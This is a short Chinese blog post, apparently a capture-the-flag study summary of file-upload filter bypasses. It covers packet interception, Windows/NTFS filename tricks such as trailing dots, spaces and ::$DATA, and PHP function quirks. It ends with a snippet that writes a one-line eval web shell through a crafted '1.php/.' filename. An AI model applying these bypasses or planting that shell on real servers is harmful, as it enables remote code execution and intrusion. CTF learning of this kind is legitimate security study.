ctf 文件上传总结
前端绕过正常上传文件,捉取数据包修改后端绕过服务器端检测的绕过windows特性windows对文件名自动去掉点 空格 ::$DATA(这个是ntfs的特性)利用这个特性绕过黑名单限制函数特性move_uploaded_file函数会自动去除文件名末尾的点 和 /.fopen函数特性<?php$filename='1.php/.';$content="<?php eval($_POST[1]);?>";$f = fopen($filename, 'w');
原创
2021-06-04 22:29:51 ·
3273 阅读 ·
0 评论